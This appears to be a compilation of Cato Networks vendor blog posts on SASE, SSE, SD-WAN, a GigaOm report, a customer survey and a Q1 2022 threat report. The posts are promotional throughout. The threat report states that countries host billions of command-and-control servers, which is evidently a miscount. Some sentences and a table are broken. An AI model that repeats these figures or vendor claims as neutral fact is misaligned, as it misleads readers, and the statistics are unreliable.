The most recent answer to the Trombone Effect is the use of “regional hubs”. These “mini” data centers host the security stack and shorten the distance between remote locations and security exit points to the internet. This approach reduces the end user performance impact, by backhauling to the nearest hub. However, the fundamental issue of managing multiple instances of the security stack remains as well as the need to set up distributed datacenters and address performance and availability requirements.
Solving the “Trombone Effect” with Cato SSE 360
Cato Networks solves the “Trombone Effect” with Cato’s Security Service Edge 360 (SSE 360), which ensures that security is available everywhere that users, applications, and data reside. Rather than making security available in just a few places,
Threat prevention and data protection are uniformly enforced via our private backbone spanning over 75+ PoPs supporting customers in 150+ countries. Because the PoPs reside within 25 ms of all users and locations, companies don’t need to set up regional hubs to secure the traffic, alleviating the cost, complexity and responsibility for capacity planning and management, while ensuring optimal security posture without compromising the user experience.
Next Steps: Get Clear on Cato SSE 360
If you are a victim of the “Trombone Effect,” then Cato Networks can easily solve this with SSE 360. Visit our Cato SSE 360 product page, to learn about our architecture, capabilities, benefits, and use cases, and receive a thorough overview of our service offering.
Since the inception of SASE, there’s been a remarkable amount of breast-beating over the number of features offered by SASE solutions. That is a mistake....
Inside SASE: GigaOm Review of 20 Vendors Finds Platforms Are Far and Few Since the inception of SASE, there’s been a remarkable amount of breast-beating over the number of features offered by SASE solutions.
That is a mistake.
SASE innovation has always been about the convergence of security and networking capabilities into a cloud service. The core capabilities of SASE are not new. Their convergence in appliances isn’t new either; that’s what we call UTMs. It’s the delivery as a secure networking global cloud service that is so revolutionary. Only with one cloud service connecting and securing the entire enterprise – remote users sites, and cloud resources – worldwide can enterprises realize the cost savings, increased agility, operational simplicity, deeper security insight and more promised by SASE.
Too often, though, media and analyst communities miss the essential importance of a converged cloud platform. You’ll read about vendor market share without consideration if the vendor is delivering a converged solution or if it’s just their old appliances marketed under the SASE brand. You’ll see extensive features tables but very little about whether those capabilities exist in one software stack, managed through one interface – the hallmarks of a platform.
GigaOm’s Radar Report Accurately Captures State of SASE Platform Convergence
Which is why I found GigaOm’s recent Radar Report on the Secure Service Access (SSA) market so significant. It is one of the few reports to accurately measure the “platform-ness” of SASE/SSA/SSE solutions. SSA is GigaOm’s terms for the security models being promoted as SSE, SASE, ZTNA, and XDR along with networking capabilities, such as optimized routing and SD-WAN. The report assesses more than 20 vendor solutions, providing detailed writeups and recommendations for each. (Click here to download and read the report.)
[boxlink link="https://www.catonetworks.com/resources/gigaoms-evaluation-guide-for-technology-decision-makers/?utm_source=blog&utm_medium=top_cta&utm_campaign=gigaom_report"] GigaOm’s Evaluation Guide for Technology Decision Makers | Report [/boxlink]
Those hundreds of data points are then collapsed into the GigaOm Radar that provides a forward-looking perspective of the vendor offerings. GigaOm plots vendor solutions across a series of concentric rings, with those set closer to the center judged to be of higher overall value. Vendors are characterized based on their degree of convergence into a platform (feature vs. platform play) and their robustness (maturity vs. innovation). The length of the arrow indicates the predicted evolution over the coming 12-18 month:
The GigaOm Radar for SSA found Cato and Zscaler to be the only Leaders who were outperforming the market.
The Findings: Platform Convergence is Not a Given in the SASE Market
The report found Cato SASE Cloud to be one of the few SSA platforms capable of addressing the networking and security needs for large enterprises, MSPs, and SMEs.
The Cato SASE Cloud provides outstanding enterprise-grade network performance and predictability worldwide by connecting sites, remote users, and cloud resources across the optimized Cato Global Private Backbone. Once connected, the Cato SSE 360 pillar of Cato SASE Cloud enforces granular corporate access policies on all applications -- on-premises and in the cloud – and across all ports and protocols, protecting users against threats, and preventing sensitive data loss.
Of GigaOm’s key SSA Criteria, the Cato SASE Cloud was the only Leader to be ranked “Exceptional” in seven of eight categories:
Defense in Depth
Unified Threat Management
Autonomous Network Security
And the company found a similarly near-perfect score when it came to the core networking and network-based security capabilities comprising SSA solutions: SD-WAN, FWaaS, SWG, CASB, ZTNA, and NDR.
“Founded in 2015, Cato Networks was one of the first vendors to launch a global cloud-native service converging SD-WAN and security as a service,” says the report. “Developed in-house from the ground up, Cato SASE Cloud connects all enterprise network resources—including branch locations, cloud and physical data centers, and the hybrid workforce—within a secure, cloud-native service. Delivering low latency and predictable performance via a global private backbone”
To learn more, download the report.
In this article, we will discuss some of the various policy objects that exist within the Cato Management Application and how they are used. You...
Cato SASE Cloud: Enjoy Simplified Configuration and Centralized, Global Policy Delivery In this article, we will discuss some of the various policy objects that exist within the Cato Management Application and how they are used. You may be familiar with the concept of localized versus centralized policies that exist within legacy SD-WAN architectures, but Cato’s cloud-native SASE architecture simplifies configuration and policy delivery across all capabilities from a true single management application.
Understanding Cato’s Management Application from Its Architecture
To understand policy design within the Cato Management application, it’s useful to discuss some of Cato’s architecture. Cato’s cloud was built from the ground up to provide converged networking and security globally. Because of this convergence, automated security engines and customized policies benefit from shared context and visibility allowing true single-pass processing and more accurate security verdicts.
Each piece of context can typically be used for policy matching across both networking and security capabilities within Cato’s SASE Cloud. This includes elements like IP address, subnet, username, group membership, hostname, remote user, site, and more. Additionally, policy rules can be further refined based on application context including application (custom applications too), application categories, service, port range, domain name, and more. All created rules apply based on the first match in the rule list from the top down.
[boxlink link="https://www.catonetworks.com/resources/cato-sse-360-finally-sse-with-total-visibility-and-control/?utm_source=blog&utm_medium=top_cta&utm_campaign=cato_sse_360"] Cato SSE 360: Finally, SSE with Total Visibility and Control | Whitepaper [/boxlink]
A Close Look at Cato’s Networking Policy
Cato’s SASE Cloud is comprised of over 75 (and growing) top-tier data center locations, each connected with multiple tier 1 ISP connections forming Cato’s global private backbone. Cato automatically chooses the best route for your traffic dynamically, resulting in a predictable and reliable connection to resources compared with public Internet. Included features like QoS, TCP Acceleration, and Packet Loss Mitigation allow customers to fine-tune performance to their needs.
1. Cato Network Rules are pre-defined to meet common use-cases. They can be easily customized or create your own rules based on context type.
By default, the Cato Management Application has several pre-defined network rules and bandwidth priority levels to meet the most common use cases, but customers can quickly customize these policies or create their own rules based on the context types mentioned above. Customers can control the use of TCP acceleration and Packet Loss Mitigation and assign a bandwidth priority level to the traffic. Additionally, traffic routing across Cato’s backbone is fully under the customer’s control, allowing egressing from any of our PoPs to get as close to the destination as possible. You can even egress traffic from an IP address that is dedicated to your organization, all without opening a support ticket.
2. Bandwidth Priorities: With Cato, it’s easy to assign a bandwidth priority level to the traffic.
Cato’s Security Policies Share a Similar, Top-Down Logic
Cato’s security policies follow the same top-down logic and benefit from the same shared context as the network policy.
3. Internet Firewall Rules enforce company-driven access policies to Internet websites and apps based on app name, category, port, protocol and service.
The Internet Firewall utilizes a block-list approach and is intended to enforce company-driven access policies to Internet websites and applications based on the application name, application category, port, protocol, and service. Unlike legacy security products, customers do not have to manage and attach multiple security profiles to their rules. All security engines (IPS, Anti-Malware, Next-Generation Anti-Malware) are enabled globally and scan all ports and protocols with exceptions created only when needed. This provides a consistent security posture for all users, locations, and devices without the pitfalls and misconfigurations of multiple security profiles.
4. Cato’s WAN Firewall provides granular control of traffic between all connected edges.
Cato’s WAN Firewall provides granular control of traffic between all connected edges (Site, Data Center, Cloud Data Center, and SDP User). Full mesh connectivity is possible, but the WAN Firewall has an allow-list approach to encourage a zero-trust access approach. The combination of source, destination, device, application, service, and other contexts is extremely flexible, allowing administrators to easily configure the necessary access between their users and locations. For example, typically only IT staff and management servers will need to connect to mobile SDP users directly, and this can be allowed in just a few clicks, or if you want to allow all SMB traffic between a site where your users are and a site with your file servers, that can also be done just as easily.
More About Cato’s Additional Security Capabilities
Cato has additional security capabilities beyond what we’ve covered, including DLP and CASB that have their own policy sets and as we continue to develop and deploy new capabilities you may see more added as well. But like what you’ve seen so far, you can expect simple, easy-to-build policies with powerful granular controls based on the shared context of both networking and security engines. Of course, all policy and service controls will be delivered from a true single-management point – the Cato Management Application.
Cato SSE 360 = SSE + Total Visibility and Control
For more information on Cato’s entire suite of converged, network security, please be sure to read our SSE 360 Whitepaper. Go beyond Gartner’s defined scope for an SSE service that offers full visibility and control of all WAN, internet, and cloud. Complete with configurable security policies that meet the needs of any enterprise IS team, see why Cato SSE 360 is different than traditional SSE vendors.
SD-WAN, SASE, & SSE are becoming mainstream, but confusion hasn’t left the building. Yet. What survey are you talking about? Twice a year, Cato Networks...
Cato 2022 Mid-Year Survey Result Summary SD-WAN, SASE, & SSE are becoming mainstream, but confusion hasn’t left the building. Yet.
What survey are you talking about?
Twice a year, Cato Networks runs a global survey that collects and analyzes the state of enterprise networking and security. Our last survey has broken all records with 3129 respondents from across the globe. More accurately, 37% from America, 33% from Europe, middle east and Africa, and 30% from Asia and Australia.
52% of them were channel partners (not necessarily ours, yet), and 48% were end customers. All of them, collectively, work with network and network security on a daily basis and know a thing or two about highest priority challenges faced by the modern enterprise.
Respondent demographics also indicate that we are looking at a versatile and reliable dataset. In terms of enterprise sizes, 27% of respondents have more than 100 sites to manage, 22% have between 25 to 100, and 51% have up to 25 sites. 44% of them operate a global organization compared to 56% who are regional or national.
When asked about their position and responsibilities, 62% confirmed they hold an IT management or leadership position. 27% with specific focus on network and 17% with specific focus on security.
We believe it’s fair to say the results we’re going to share here are as objective as possible.
The Market is Aware of SASE and SSE, But Aren’t Clear on the Differences
The market is showing awareness and understanding of both SASE (est. 2019) and Security Service Edge (SSE) (est. 2021.) However, the rise of “too many acronyms” is leading to market confusion, specifically related to architecture, value propositions and differentiation.
When we asked, “How well do you believe you understand the SASE architecture and its benefits?”, 45% responded that they feel they understand both very well. It would look very positive if we stopped here, but at the same time, 20% felt vague regarding the architecture, 12% felt vague about the value, and 23% felt vague about both. Oh no.
The confusion continued even further when we asked if they know what’s the difference between SASE and SSE. It wasn’t a test, but only 47% passed. Very close to the 45% who felt confident on SASE’s architecture and value.
Going about it from another angle, we asked “Do you consider SSE as an interim step to SASE?”. 29% answered they do, and 38% answer they don’t. The red flag is the 33% who answered that they aren’t sure what the difference is between SSE and SASE.
[boxlink link="https://www.catonetworks.com/resources/cato-sse-360-finally-sse-with-total-visibility-and-control/?utm_source=blog&utm_medium=top_cta&utm_campaign=cato_sse_360"] Cato SSE 360: Finally, SSE with Total Visibility and Control | Whitepaper [/boxlink]
Choose Wisely: Will it Be One or Multi-Vendor SASE?
In answer to our question “What is your SASE migration timeline?”, 17% responded it already stared in 2020 or 2021, 18% responded that it is happening this (2022) year, and 44% said that it’s targeted for 2023.
Similarly, 54% reported they already have C-level sponsorship for their SASE project from either their CEO (12.5%), CIO (24%), CFO (5%) or CISO (12.5%).
But with so much focus on SASE and confusion surrounding SSE, what’s most important to pay attention to?
36% of respondents who already have SD-WAN in their networks indicated that they plan to replace it. 29% plan to deploy SSE as an interim step towards full SASE deployment, and 38% told us they are going all in on SASE.
On top of those findings, 40% indicated that a single-vendor SASE is very important in their vendor selection, and 25% ranked this as extremely important. This correlates very well with 77% who indicated a single management for all network and security infrastructure is very or extremely important.
So, what’s the gist here?
The bottom line here is simple. SASE is the end-game and the SASE revolution is currently well underway.
Every IT leader and team should both strategize and prioritize their path to SASE. It can be a gradual multi-project approach or undertaken as a single project. It can rely on an existing network and security stack or a refresh of legacy products.
Crowd wisdom also shows that so many people who work daily with SD-WAN, SASE and SSE value the importance of single-vendor and single management solutions, and so should you.
So, when your C-level sponsor asks you about your SASE migration strategy, make sure you are aligned with the voice of the industry, that you have a plan, and that you know how to choose the right vendor for your enterprise.
And what about the confusion between SASE and SSE? What about those who don’t feel they know enough about one or both acronyms? It’s a perfectly normal place to be in, and a challenge anyone can easily overcome in just a few short hours.
Cato Networks offers free SASE and SSE education courses to get you up to speed and on par with industry standards. Check out our free SASE and SSE certification courses, to expand your knowledge base, and learn about these new and evolving categories.
Now how ‘bout that?
Technology is fast-paced and constantly changing, but it seems like the past few years have broken every record. Covid-19 and the transition to remote work,...
15 Networking Experts To Follow on LinkedIn Technology is fast-paced and constantly changing, but it seems like the past few years have broken every record. Covid-19 and the transition to remote work, high-profile cyber security attacks and massive geo-political shifts have enhanced and intensified the need for new networking solutions, and vendors are quick to respond with new networking point solutions which address the problems de jour.
But how can IT teams and network architects make heads or tails of these rapid shifts? Such intense global and industry-wide changes require the advice of experts who are familiar with both the technical and business landscape, and can speak to the newest technology trends.
Below, we’ve listed 15 of the top experts in enterprise networking and SD-WAN that we recommend following on Linkedin. They are masters in their domain, and industry leaders who can help you stay up-to-date with the latest developments in the world of enterprise networking. They have many years of hands-on and consulting experience, so when they speak about enterprise networks, it’s always worth hearing what they have to say.
1. Greg Ferro
Greg is a co-founder of Packet Pushers, an online media outlet that has covered data, networking and infrastructure for over 12 years. Packet Pushers provides valuable information that can help nearly any professional in the networking field including insights on: public cloud usage, SD-WAN, five minute vendor news, IPv6, and more. Home to a series of podcasts, blog posts, articles, a Spotify channel, and even a newsletter - it’s a multi-media experience. Besides Packet Pushers, Greg runs another well-known industry blog, EtherealMind.com.
2. Ivan Pepelnjak
Ivan is a blogger at ipSpace.net, an author, a webinar presenter and a network architect. His writings and webinars focus mainly on network automation, software-defined networking, large-scale data center tech, network virtualization technologies and advanced IP-based networks. By following him and/or ipSpace.net, you will have access to a plethora of network technology resources, including online courses, webinars, podcasts and blogs.
3. Orhan Ergun
Orhan is an IT trainer, an author and a network architect. On Linkedin, Orhan shares his ideas and thoughts, as well as updates about his recent webinars, blog posts and training courses, to his ~40,000 followers. He also spices up his updates by sprinkling in funny memes with inside IT humor. Orhan’s courses can be found on his website at orhanergun.net, where he focuses on network design, routing, the cloud, security and large-scale networks.
4. Jeff Tantsura
Jeff is a Sr. Principal Network Architect at Azure Networking, as well as a writer, editor, podcaster, patent inventor and advisor to startups in networking and security areas. His podcast, “Between 0x2 Nerds”, is bi-monthly and discusses networking topics including: network complexity, scalability, up-and-coming technologies and more. The podcast hosts industry experts, software engineers, academia researchers and decision-makers - so when listening to it, you can expect to hear from professionals with a wide variety of opinions, points of view and areas of expertise!
5. Daniel Dib
Daniel Dib is a Senior Network Architect experienced in routing, switching and security. He is also a prolific content creator, writing blog posts for his own networking-focused blog “Lost in Transit”, as well as additional publications, like “Network Computing”. It’s a great choice if you’re interested in learning more about CCNA, CCNP, CCDP, CCIE, CCDE and all of our various certification courses. His social media posts cover both professional and personal matters, for those of you who like to get to know the person behind the professional.
[boxlink link="https://www.catonetworks.com/resources/4-considerations-to-take-before-renewing-your-sd-wan-product-or-contract/?utm_source=blog&utm_medium=top_cta&utm_campaign="4_considerations_before_sd-wan"] 4 Considerations to Take Before Renewing Your SD-WAN Product or Contract | EBOOK [/boxlink]
6. David Bombal
David Bombal is an author, instructor and YouTuber, creating content for networking professionals across multiple channels. Focusing on topics like network automation, Python programming, ethical hacking and Cisco exams, his videos, podcasts and courses provide a wide range of resources for beginners and advanced learners. David’s online Discord community is also worth visiting, as an online venue for ongoing IT support and communication.
7. John Chambers
John is the CEO of JC2 Ventures and was previously at Cisco for 26 years, serving as CEO, Chairman and President, among other positions. With more than 263,000 followers on Linkedin and more than 22,000 on Twitter, John is an important source of information for networking professionals interested in a broader, more strategic view of the technological market.
8. Tom Hollingsworth
Tom is a networking analyst at Foskett Services and the creator of networkingnerd.net, an online media outlet where he offers a tongue-in-cheek take on networking news and trends. In his latest post he compares Apple Air Tags and lost luggage at airports to SD-WAN. If blog posts aren’t your thing, you can also hear what Tom has to say on his “Tomversations” YouTube playlist or by attending the “Tech Field Day” events he organizes.
9. Matt Conran
Matt is a cloud and network architecture specialist with more than 20 years of networking experience in support, engineering, network design, security and architecture. Matt juggles consultancy as an independent contractor with publishing technical content on his website “Network Insight” and with creating training courses on Pluralsight. On his website, you can find helpful explainer videos and posts on a variety of networking topics including cloud security, observability, SD-WAN and more.
10. Russ White
Russ White is an infrastructure architect, co-host of “The Hedge”, a computer network podcast, and blogger. He has also published a number of books on network architecture. His Linkedin posts are a bulletin board of his latest blog and podcast updates, so by following him you can stay on track of his latest publications, ranking from hands-on network advice to info on how technology will be shaped by global events.
11. Ben Hendrick
Ben is the Chief Architect in the Office of the CTO of the Global Secure Infrastructure Domain at Microsoft. His Linkedin posts focus mainly on recent cybersecurity updates, covering specific events as well as industry trends. With nearly 35 years of network and security experience, you can be sure his daily updates are based on broad insights and a deep familiarity with the networking and security space.
12. Ashish Nadkarni
Ashish leads two research groups at analyst firm IDC. Both of them - Infrastructure Systems, Platforms and Technologies (ISPTG) and BuyerView Research - are part of IDC's Worldwide Enterprise Infrastructure practice. Ashish delivers reports, blog posts and webinars, and his Linkedin feed to keep up with the latest trends and technologies in networking. Examples of his previous posts include preparing for IT infrastructure supply shortages, storage for AI workloads, and takeaways from networking industry events.
13. Erik Fritzler
Erik has nearly 25 years of experience in network architecture and regularly posts blogs on “Network World”. He specializes in SD-WAN, Network Design, and Engineering and IT Security. In his recent blog post “Why WAN metrics are not enough in SD-WAN policy enforcement”, he discusses how SD-WAN captures metrics that go far beyond the typical WAN measurements including application response time, network transfer time, and server response time.
14. Matt Simmons
Matt is an SRE at SpaceX, where he is responsible for the infrastructure around the ground control plane. His team owns the OS installation on bare metal, up through the Kubernetes orchestration layer, as well as monitoring, CI/CD and more. If you’re interested in learning about technological “How To’s” and the science of space, Matt’s Linkedin is the place for you. Matt also has a Github repository where he hosts projects and experiments that may be helpful to networking professionals.
15. Cato Networks
Did you know that Cato Networks is also on social? Our social channels are a great way to keep on top of SASE and Security Service Edge (SSE) updates, read original research and even get access to “member only” exclusive events. We run surveys, host giveaways and include updates from industry experts, like our CEO and COO, Shlomo Kramer (co-founder of Check Point,) and Gur Shatz (co-founder of Imperva).
Who Do You Follow?
As business needs and technologies evolve, it can be difficult to constantly keep up with the changes. Experts like the 15 listed above can help, by passing on their know-how, insights and experience through their Linkedin, blogs, Youtube channels, or whatever way you prefer to consume content.
So, who do you follow? Share with us on Linkedin.
In 2021, Gartner introduced a new security category – SSE (Security Service Edge). In this blog post, we’ll explain what SSE is, how SSE is...
SSE (Security Service Edge): The Complete Guide to Getting Started In 2021, Gartner introduced a new security category - SSE (Security Service Edge). In this blog post, we’ll explain what SSE is, how SSE is different from SASE and compare traditional SSE solutions to Cato SSE 360. This blog post is an excerpt from our new Cato SSE 360 whitepaper, but if you’re interested in learning more information, we highly recommend you read the complete whitepaper.
What is SSE?
Before we explain SSE, let’s start by giving more context. In 2019, Gartner introduced the new SASE market category. SASE (Secure Access Service Edge) is the convergence of SD-WAN and network security as a cloud-native, globally-delivered service. As a result, SASE solutions can provide work from anywhere (WFA users) with optimized and secure access to any application. From the security side, SASE includes SWG, CASB/DLP, FWaaS and ZTNA.
Then, in 2021, Gartner introduced another related market category called SSE (Security Service Edge). SSE offers a more limited scope of converged network security than SASE. SSE converges SWG, CASB/DLP and ZTNA security point solutions, into a single, cloud-native service. Therefore, SSE provides secure access to internet and SaaS applications, but does not address the network connectivity and east-west WAN security aspects of that access, which remains as a separate technology stack.
[boxlink link="https://www.catonetworks.com/resources/cato-sse-360-finally-sse-with-total-visibility-and-control/?utm_source=blog&utm_medium=top_cta&utm_campaign=cato_sse_360"] Cato SSE 360: Finally, SSE with Total Visibility and Control | Whitepaper [/boxlink]
SSE vs. SASE
To sum up the comparison:
SASE Traditional SSE Services Year Introduced 2019 2021 Technological Pillars Converged Networking and Network Security Limited convergence of network security only Key Components SD-WAN, SWG, CASB/DLP, FWaaS, ZTNA, RBI, Unified Management SWG, CASB/DLP and ZTNABusiness Value Resiliency, security, optimization, visibility and control Limited network security (secure access to SaaS and web traffic)
Why Do Businesses Need SSE? (Traditional SSE Capabilities and Benefits)
Optimized and secure global access to internet and SaaS applications and data is essential for businesses’ technical requirements and the evolving threat landscape. But rigid security architectures and disjointed point solutions lower business agility and increase risk. This is where SSE shines.
Consistent security policy enforcement - full inspection of traffic between any two edges while enforcing threat prevention and data protection policies
Reduced attack surface with Zero Trust Network Access (ZTNA) - ensuring users can only access authorized applications
Elastic, high performance security inspection - securing traffic at scale through a global backbone of scalable Points of Presence (PoPs)
Improved security posture - monitoring the threat landscape and deploying mitigations to emerging threats through the SSE provider’s SOC (instead of the IT staff)
Reduced enterprise IT workload without customer involvement - continuously updating the cloud service with new enhancements and fixes, while reducing workload
As a result of these benefits, SSE offers businesses secure public cloud and web access, threat detection and prevention capabilities, secure and optimized remote access and sensitive Data Loss Prevention.
How to Get Started with SSE
Today, many businesses are still using legacy architectures. This impedes digital transformation because:
Legacy networks are built around physical corporate locations - a digital architecture requires re-architecture of the network
Centralized (backhauling) security models slow down secure cloud access - direct secure Internet should be available at any location for any user
Legacy security solutions can’t scale - they can’t support a hybrid workforce working from anywhere
Disjointed solutions are fragmented and complex to manage - this requires more work from IT and increases the likelihood of manual configuration errors
To get started with SSE, businesses should choose an SSE vendor that can help them overcome these challenges. Such a vendor will provide total visibility and control across all edges and all traffic, support a global footprint with high performance security, converge management and analytics with a single pane of glass, ensure a future proof and resilient SSE service.
Introducing Cato SSE 360: Going Beyond Gartner’s SSE
Cato SSE 360 goes beyond Gartner’s scope of SSE, to provide total visibility, optimization and control for all traffic, users, devices, and applications everywhere. Not only does it provide secure and optimized access to the internet and public cloud applications, but also to WAN resources and cloud datacenters, reducing your attack surface and eliminating the need for additional point solutions like firewalls, WAN optimizers and global backbones. And, Cato SSE 360 provides a clear path to single-vendor SASE convergence through gradual migration, if and when your organization requires. Follow the link for more information about Cato SSE 360.
Cato SSE 360 reduces cost and complexity with simple management through a single pane of glass, self-healing architecture and defenses that evolve automatically while mitigating emerging threats. Customers can choose to manage themselves or co-manage with partners.
Cato SSE 360 Components
Cato SSE 360 provides the following platform components:
Cloud-native security service edge
Cato global private backbone
Cato SDP clients
IPsec-enabled devices and Cato Socket SD-WAN for locations
Comprehensive management application for analytics and policy configuration
As a result, Cato SSE 360 is ideal for the following use cases:
Scalable hybrid work
Gradual cloud migration
Secure sensitive data
Instant deployment of security capabilities
Future-proofing and ongoing security maintenance
Seamless, single-vendor SASE convergence
Cato SSE 360 extends SSE by providing full visibility and control across all traffic, optimized global application access and is the only service which supports a seamless path to a complete, single-vendor SASE, if and when required. Read the full Cato SSE 360 whitepaper and get started on your SSE journey today.
Log4j is a Java-based, ubiquitous logging tool that is said to be used by nearly 13 billion devices world-wide. Late last year, in December 2021,...
Spring4Shell Might Grab Headlines, But Log4j Exploits Swamped Enterprises, Finds Cato Threat Report Log4j is a Java-based, ubiquitous logging tool that is said to be used by nearly 13 billion devices world-wide. Late last year, in December 2021, the Apache Software Foundation announced the discovery of a software vulnerability (CVE-2021-44228 a.k.a. Log4Shell) that allows unauthenticated users to remotely execute or update software code on multiple applications via web requests. As soon as the vulnerability was announced, researchers at Cato Networks noted over 3 million attempts (in Q4 2021) aimed at exploiting this vulnerability.
Fast forward to Q1 2022 and the number of attempts to exploit this vulnerability have increased to a whopping 24 million. According to the Cato Networks SASE Threat Research Report, Log4j vulnerabilities were leveraged all across the world, including cyber-attacks on Ukrainian organizations.
Interestingly, number two on the list of the top five CVE exploit attempts was a Java vulnerability (CVE-2009-2445) that has been around for more than a decade. Threat actors made almost 900,000 attempts (double than previous quarter) to exploit this vulnerability for initial access. Above research highlights the fact that while certain zero-day vulnerabilities (like Spring4Shell or CVE-2022-22965) grabbed news headlines, it is the legacy vulnerabilities that put enterprises at the most risk.
[boxlink link="https://www.catonetworks.com/cybersecurity-masterclass/?utm_source=blog&utm_medium=top_cta&utm_campaign=masterclass"] Join one of our Cyber Security Masterclasses | Go now [/boxlink]
Majority of Exploitation Events Originated in the U.S.
Understanding where attacks originate from or who (or where) the malware communicates to is a critical part of any organization's threat response strategy. Attackers are aware of the fact that traffic to or from certain countries may be blocked, inspected or investigated and that’s the reason why a majority of them ensure that their command and control (C&C) infrastructure is hosted in a country that is labeled as “safe”. While the U.S. is the most favored destination (hosts 17.3 billion C&C servers), China comes second (with 2 billion C&C servers), followed by Germany (1.66 billion), UK (1.29 billion) and Japan (1 billion).
Reputation-based Threats, Brute Force and Remote Code Execution Attacks Skyrocket
After analyzing 26 billion security events across 350 billion network flows, Cato researchers noted a 33% decline in attackers attempting to perform network scans. That being said, network scans still reign as the number one threat type (10 billion plus attempts), followed by reputation-based threats (1.5 billion attempts) or security events that are triggered by inbound or outbound communications to known malicious destinations.
Reputation-based threats grew more than 100% over the previous quarter. In addition to this, the Cato Threat Hunting System also observed that crypto-mining numbers continue to climb, while brute force attacks and remote code execution attacks have nearly tripled in comparison to the previous quarter.
Attackers Are Frequently Scanning Network Hardware and Software For Initial Access
Cato carried out an analysis based on the MITRE ATT&CK framework and concluded that network-based scanning is the most frequently used attack vector to gain initial access in an enterprise environment. Active Scanning (T1595 - 6.9 billion flows), Network Discovery (T1046 - 4.1 billion flows) and Remote System Discovery (T1018 - 2.7 billion flows) are the top three techniques employed by attackers. That’s not all, once adversaries have initial access they actively search data from local systems (T1005 - 9.5 million incidents), look for valid accounts (T1078 - 6.9 million incidents) and try to brute force access if credentials are not accessible (T1110 - 6.9 million incidents).
Risks Are Also Originating from Popular Consumer Apps Like Telegram and TikTok
While many governments have raised privacy concerns around the use of TikTok and even attempted to censor its use, Cato research finds that most enterprises still continue to allow TikTok flows. In fact, use of this short form video-haring app grew by 10% over the previous quarter. In addition to this, use of the instant-messaging app Telegram more than tripled, probably due to the Ukraine-Russia crisis, and YouTube grew by 25%. Growth in such non-business, consumer apps operating on enterprise networks significantly widens the attack surface, exposing organizations and people to greater risk of being targeted with phishing and other social engineering schemes.
What Can Organizations Do To Protect Themselves?
While security isn’t one-size-fits-all, below are some general recommendations and best practices that can help:
Execute a detailed audit of every website, system and application on a regular basis. Prioritize critical risks and plug those loopholes proactively.Patch all applications regularly and ensure they are running the most up-to-date software.Replace security point solutions and legacy network services with a solution that is more converged (or holistic) like SASE. A convergence of networking and security provides unique visibility into network usage, hostile network scans, exploitation attempts and malware communication to C&C servers.When organizations encounter zero-day vulnerabilities like Log4j, they must immediately implement virtual patching so that security teams can neutralize the threat and buy additional time till they are able to apply necessary and permanent fixes.Train staff regularly so they do not fall prey to phishing and social engineering scams.Try and restrict use of consumer applications (e.g., TikTok, Telegram) in enterprise environments as this can significantly minimize risk and lower possibility of infectious lateral movement.Be vigilant, have reporting and monitoring processes in place and be on guard for any changes in the attack surface.
Follow the link to get the full Q122 Cato Networks SASE Threat Research Report.
Happy To Announce the Birth of a New Technology – SD-WAN It wasn’t that long ago that we oohed and ahhed over the brand-new technology...
Is SD-WAN Really Dead? Happy To Announce the Birth of a New Technology - SD-WAN
It wasn’t that long ago that we oohed and ahhed over the brand-new technology called SD-WAN. The new darling of the networking industry would free us from the shackles of legacy MPLS services. But just as we’re getting used to the toddling SD-WAN, along came yet another even more exciting newborn, the Secure Access Service Edge (SASE). It would give us even more – more security, better remote access, and faster deployment. SD-WAN? That’s so yesteryear – or is it? Is SD-WAN another networking technology to be cast off and forgotten in this SASE world, or does SD-WAN continue to play an important role? Let’s find out.
SD-WAN: The Toddler Years
When SD-WAN was born, there was much to love. It was cute, shiny, and taught enterprises how to walk -- walk away, that is, from MPLS – to a network designed for the new world. MPLS came of age when users worked in offices, resources resided in the datacenter, and the Internet was an afterthought. It was hopelessly out of step with a world that needed to move fast and one obsessed with the Internet.
SD-WAN addressed those problems, creating an intelligent overlay that allowed companies to tap commodity Internet connections to overcome the limitations of MPLS. More specifically this meant:
More capacity to improve application performance
Reduced network costs by using affordable Internet access, not high-priced MPLS capacity.
More bandwidth flexibility by aggregating Internet last mile connections
Improved last-mile availability by connecting sites through active/active connections
Faster deployments allowing sites to be connected in days not months
[boxlink link="https://www.catonetworks.com/resources/5-things-sase-covers-that-sd-wan-doesnt/?utm_source=blog&utm_medium=top_cta&utm_campaign=5_sd-wan_gaps_answered_by_sase"] 5 Things SASE Covers that SD-WAN Doesn’t | EBOOK [/boxlink]
SD-WAN: The Teenager That Disappoints
But then the world changed – again. Resources moved into the cloud and the pandemic sent everyone home. Suddenly the office was no longer the focus of work. Solving the site-to-site communications challenge was no longer sufficient. Now companies needed a way to bring advanced security to wherever resources resided, in the cloud or the private data center, and wherever users worked, in the office, at home, or on the road, and do all of that without compromising performance. None of that was in SD-WAN's job description, making the following use cases particularly challenging:
SD-WAN lacks support for remote access -- period. There was no mobile client to join an SD-WAN. But today secure remote access is an essential pillar for guaranteeing business continuity.
SD-WAN is limited in its cloud readiness. As an appliance-based architecture, SD-WAN requires the management and integration of proprietary appliances to connect with the cloud. Expensive premium cloud connectivity solutions, like AWS Direct Connect or Azure ExpressRoute for optimized cloud connectivity.
SD-WAN might perform well enough within a region, but the global Internet is too unpredictable for the enterprise. It’s why all SD-WAN players encourage the use of third-party backbones for global connectivity. Such an approach, though, increases the complexity and costs of a deployment, and fails to deliver the benefits of optimized performance.
SD-WAN lacks the necessary security to protect branch offices. Next-generation firewall (NGFW), Intrusion Prevention Systems (IPS), Secure Web Gateway (SWG), anti-malware – all necessary components for protecting the enterprise and none of which are provided by SD-WAN. Factoring in the necessary appliances and services for delivering these capabilities significantly increases the cost and complexity of SD-WAN deployments.
SD-WAN: The Senior Years
So, SD-WAN isn’t perfect, but you might be wondering, why not let it coexist with the rest of the security and networking infrastructure? Just deploy a SWG or a Security Service Edge (SSE) solution. Doing so, though, leads to a network that’s at best managed with separate brains – one for your SD-WAN and another for your security infrastructure – and more likely additional “brains” for handling the rest of your security infrastructure and the global backbone.
And with multiple brains, everything becomes more complicated:
Forget zero-touch:SD-WAN made noise about claiming to offer zero-touch configuration, but the reality is far different. Without the necessary security capabilities, SD-WANs become far more complicated to deploy, requiring the additional security appliances to be assessed, purchased, delivered to the locations, installed, and integrated.
High Availability (HA) becomes a headache:With SD-WAN relying on Internet connections, HA is all but required. But with multiple brains, HA becomes far more challenging. There’s no automated provisioning of resilient connections between devices or services. There’s also no associated dynamic failover, requiring companies to install backup appliances and additional operational time testing failover scenarios.
Visibility is limited:Fragmenting data across multiple networking and security systems means you never have a complete view of your network. You can’t spot the network indicators of new threats. Outages become more difficult to troubleshoot with data hiding within multiple appliance logs.
